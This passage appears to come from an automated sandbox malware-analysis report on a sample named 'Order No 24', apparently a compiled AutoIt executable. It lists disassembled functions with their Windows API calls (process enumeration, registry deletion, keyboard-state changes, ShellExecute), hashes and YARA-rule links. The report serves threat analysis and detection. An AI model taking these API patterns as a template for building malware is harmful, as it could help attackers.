                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3356174886-0
                                                                                                                                  • Opcode ID: ea6b5eb1631e1079ec4f35cf3c603381a6eb7d1dfaadb1844aa95c35e67fad94
                                                                                                                                  • Instruction ID: 870bff5ad7d396cfcf0dc806e510c46153854778e8aa92b245e75b9cf895f7f3
                                                                                                                                  • Opcode Fuzzy Hash: ea6b5eb1631e1079ec4f35cf3c603381a6eb7d1dfaadb1844aa95c35e67fad94
                                                                                                                                  • Instruction Fuzzy Hash: 2EA1DF3560061AEFDB18CF68C9857FDBBB9BF88700F048115EE58A7291E774AD61CB90
                                                                                                                                  Function 0099AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b99bb406217b1b8acdf07ab84696fe54608f8400ed798d35355067fd1a2f8e5a
                                                                                                                                  • Instruction ID: fb40b33c2f44e7bee82ca482c185e9a4407dbe1fd273423b65f0e8f5f29baa54
                                                                                                                                  • Opcode Fuzzy Hash: b99bb406217b1b8acdf07ab84696fe54608f8400ed798d35355067fd1a2f8e5a
                                                                                                                                  • Instruction Fuzzy Hash: 21716CB1900109EFDF14CF98CC89ABEBB78FF85314F248149F915AA251C734AA52CFA5
                                                                                                                                  Function 009E2230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 009E225A
                                                                                                                                  • _memset.LIBCMT ref: 009E2323
                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 009E2368
                                                                                                                                    • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                                                                                                                    • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                                                                                                                    • Part of subcall function 0099C6F4: _wcscpy.LIBCMT ref: 0099C717
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009E242F
                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 009E243E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 4082843840-2766056989
                                                                                                                                  • Opcode ID: 21c188a3a17c053b7c743ceb3d3d5d53e85b340594130096564f3652a6e75eca
                                                                                                                                  • Instruction ID: eb2c61d75905d697c4d717d560f5b826b038a32cfe5a6f355d07a8a97b9ca796
                                                                                                                                  • Opcode Fuzzy Hash: 21c188a3a17c053b7c743ceb3d3d5d53e85b340594130096564f3652a6e75eca
                                                                                                                                  • Instruction Fuzzy Hash: E3716F719006599FCF05EFA9C881AAEB7F9FF88310F108459E855AB391DB34AD41CF90
                                                                                                                                  Function 009C3DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetParent.USER32(?), ref: 009C3DE7
                                                                                                                                  • GetKeyboardState.USER32(?), ref: 009C3DFC
                                                                                                                                  • SetKeyboardState.USER32(?), ref: 009C3E5D
                                                                                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 009C3E8B
                                                                                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 009C3EAA
                                                                                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 009C3EF0
                                                                                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 009C3F13
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 87235514-0
                                                                                                                                  • Opcode ID: 8339f13251d74f9cee9341f1006ed0e976a5132f4f263559a97f0364b5448609
                                                                                                                                  • Instruction ID: 167fcdc833944c09df3eccc8bb4c97639148f3fd5c145028c6869cb799c52d31
                                                                                                                                  • Opcode Fuzzy Hash: 8339f13251d74f9cee9341f1006ed0e976a5132f4f263559a97f0364b5448609
                                                                                                                                  • Instruction Fuzzy Hash: 2651D2A0E087D53EFB3643648C55FB67EA95B06304F08C98DF0D5568C2D2A9AEC4D762
                                                                                                                                  Function 009C3BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetParent.USER32(00000000), ref: 009C3C02
                                                                                                                                  • GetKeyboardState.USER32(?), ref: 009C3C17
                                                                                                                                  • SetKeyboardState.USER32(?), ref: 009C3C78
                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 009C3CA4
                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 009C3CC1
                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 009C3D05
                                                                                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 009C3D26
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 87235514-0
                                                                                                                                  • Opcode ID: ca0403bcf45d9c5f96c2104b719a34a9bbf989b03d3ee58292e2d9d84bd3e649
                                                                                                                                  • Instruction ID: 85978164d5f79c51bd044118231c4e1752b319a5ccd919f7eeb0220f5dd225f8
                                                                                                                                  • Opcode Fuzzy Hash: ca0403bcf45d9c5f96c2104b719a34a9bbf989b03d3ee58292e2d9d84bd3e649
                                                                                                                                  • Instruction Fuzzy Hash: B151F6A1E487D53DFB3283648C55FBABE9D6B06300F0CC48CE4D6568C2D695EE84D762
                                                                                                                                  Function 009C7DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcsncpy$LocalTime
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2945705084-0
                                                                                                                                  • Opcode ID: 6d97b6ff4558afb2ee1e3353088e0809f716b662813cb15b622d3edd387ac4c3
                                                                                                                                  • Instruction ID: def2745a575be41be06123f9c5c7bbe99638a9562261d2c3eaff9152b3131566
                                                                                                                                  • Opcode Fuzzy Hash: 6d97b6ff4558afb2ee1e3353088e0809f716b662813cb15b622d3edd387ac4c3
                                                                                                                                  • Instruction Fuzzy Hash: 46417166C1021476DF10EBF8C886BCFB7ACDF86710F50896AE514E3122FA35E61487E6
                                                                                                                                  Function 009E3D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 009E3DA1
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009E3DCB
                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 009E3E80
                                                                                                                                    • Part of subcall function 009E3D72: RegCloseKey.ADVAPI32(?), ref: 009E3DE8
                                                                                                                                    • Part of subcall function 009E3D72: FreeLibrary.KERNEL32(?), ref: 009E3E3A
                                                                                                                                    • Part of subcall function 009E3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 009E3E5D
                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 009E3E25
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 395352322-0
                                                                                                                                  • Opcode ID: 98ffbf0517ea95c15b4f556cd47e1147aa2368e6f618f9b44ef11345db73bc8b
                                                                                                                                  • Instruction ID: 228bb0c7001d9f857d73da7f36559e19b0986b3fffe3db8164fbde27c6728f2e
                                                                                                                                  • Opcode Fuzzy Hash: 98ffbf0517ea95c15b4f556cd47e1147aa2368e6f618f9b44ef11345db73bc8b
                                                                                                                                  • Instruction Fuzzy Hash: 7331EAB2901149BFDB15DFD5DC89AFFB7BCEB08300F00416AE512A3150DA749F8A9BA0
                                                                                                                                  Function 009E8FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 009E8FE7
                                                                                                                                  • GetWindowLongW.USER32(0101E788,000000F0), ref: 009E901A
                                                                                                                                  • GetWindowLongW.USER32(0101E788,000000F0), ref: 009E904F
                                                                                                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 009E9081
                                                                                                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009E90AB
                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 009E90BC
                                                                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009E90D6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LongWindow$MessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2178440468-0
                                                                                                                                  • Opcode ID: db5a20edd1aad7af8c448ee04840a75167953c9d8a81d0738db6ace3d8a6a6c3
                                                                                                                                  • Instruction ID: d2afda25ed2b9391f047838a2315b16ec9b36f1ff3bd79ec3238ea83f7e3cd20
                                                                                                                                  • Opcode Fuzzy Hash: db5a20edd1aad7af8c448ee04840a75167953c9d8a81d0738db6ace3d8a6a6c3
                                                                                                                                  • Instruction Fuzzy Hash: 4D316479210254EFDB22CF99DC84F6477A9FB8A315F150164F5098B2B2CB72AC42CB40
                                                                                                                                  Function 009C08AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009C08F2
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009C0918
                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 009C091B
                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 009C0939
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 009C0942
                                                                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 009C0967
                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 009C0975
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3761583154-0
                                                                                                                                  • Opcode ID: db88c151999082b1ee60b46a9b18c66b0dabb1d021b36b0895ff3aa02e37600c
                                                                                                                                  • Instruction ID: 2d3e2d2f08625d4f6f43df9eab478e345f90e8aabb4fba0c731e019f416427c8
                                                                                                                                  • Opcode Fuzzy Hash: db88c151999082b1ee60b46a9b18c66b0dabb1d021b36b0895ff3aa02e37600c
                                                                                                                                  • Instruction Fuzzy Hash: F2218376A01219AFEF10DFACCC88EBB73ECEB49360B408525F915DB161D674EC468B61
                                                                                                                                  Function 009C2472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __wcsnicmp
                                                                                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                  • API String ID: 1038674560-2734436370
                                                                                                                                  • Opcode ID: 01de57be63597b37df5824403691acd3d449754e6bcf36f5b44d54a7e5b789c3
                                                                                                                                  • Instruction ID: 0027f18cb83065012bdaf05a8fd9129bf2e34517d8457c2f10c381499f1a84e5
                                                                                                                                  • Opcode Fuzzy Hash: 01de57be63597b37df5824403691acd3d449754e6bcf36f5b44d54a7e5b789c3
                                                                                                                                  • Instruction Fuzzy Hash: 9D216E7250455177D724B7389C12FBB73ACEFA5310F10442DF44597182E7699941C3E7
                                                                                                                                  Function 009C0986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009C09CB
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009C09F1
                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 009C09F4
                                                                                                                                  • SysAllocString.OLEAUT32 ref: 009C0A15
                                                                                                                                  • SysFreeString.OLEAUT32 ref: 009C0A1E
                                                                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 009C0A38
                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 009C0A46
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3761583154-0
                                                                                                                                  • Opcode ID: 007744669e4ab29fe8bec324907636b8f761ce55246ed9bfa2c11afd42a05c72
                                                                                                                                  • Instruction ID: 2d5488cff8189900c7a3784688dd9daf57b1f43be9896c2ecedb7f8d679356ad
                                                                                                                                  • Opcode Fuzzy Hash: 007744669e4ab29fe8bec324907636b8f761ce55246ed9bfa2c11afd42a05c72
                                                                                                                                  • Instruction Fuzzy Hash: 6C215676600204AFDB10DFE8DC89EBAB7ECEF48360B40C129F909CB261D674EC468765
                                                                                                                                  Function 009EA2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0099D1BA
                                                                                                                                    • Part of subcall function 0099D17C: GetStockObject.GDI32(00000011), ref: 0099D1CE
                                                                                                                                    • Part of subcall function 0099D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0099D1D8
                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 009EA32D
                                                                                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 009EA33A
                                                                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 009EA345
                                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 009EA354
                                                                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 009EA360
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                  • String ID: Msctls_Progress32
                                                                                                                                  • API String ID: 1025951953-3636473452
                                                                                                                                  • Opcode ID: 57da5e55753d5cd196652b673611fb965ce430383a02ffa365bfaff54cf753e7
                                                                                                                                  • Instruction ID: 553966283258533e690741716308d7b58b11a4a2eaab215765eccfec496a2df7
                                                                                                                                  • Opcode Fuzzy Hash: 57da5e55753d5cd196652b673611fb965ce430383a02ffa365bfaff54cf753e7
                                                                                                                                  • Instruction Fuzzy Hash: DE1193B115011DBEEF159FA5CC85EE77F6DFF09798F014115BA04A6060C672AC22DBA4
                                                                                                                                  Function 0099CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0099CCF6
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0099CD37
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 0099CD5F
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0099CE8C
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0099CEA5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Rect$Client$Window$Screen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1296646539-0
                                                                                                                                  • Opcode ID: 4fe51f2d18c78631ec1babb1004b06239257c12cd1d46eae45104b0023c915fa
                                                                                                                                  • Instruction ID: 114bfdf062bfa95b7fa75f094b20811667b2f487f1daebcaf61e43907060ccb7
                                                                                                                                  • Opcode Fuzzy Hash: 4fe51f2d18c78631ec1babb1004b06239257c12cd1d46eae45104b0023c915fa
                                                                                                                                  • Instruction Fuzzy Hash: D5B14BB9A00249DBDF10CFA8C8807EDB7B5FF08350F149529ED5AAB254DB34AD51CB64
                                                                                                                                  Function 009E1BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 009E1C18
                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 009E1C26
                                                                                                                                  • __wsplitpath.LIBCMT ref: 009E1C54
                                                                                                                                    • Part of subcall function 009A1DFC: __wsplitpath_helper.LIBCMT ref: 009A1E3C
                                                                                                                                  • _wcscat.LIBCMT ref: 009E1C69
                                                                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 009E1CDF
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 009E1CF1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
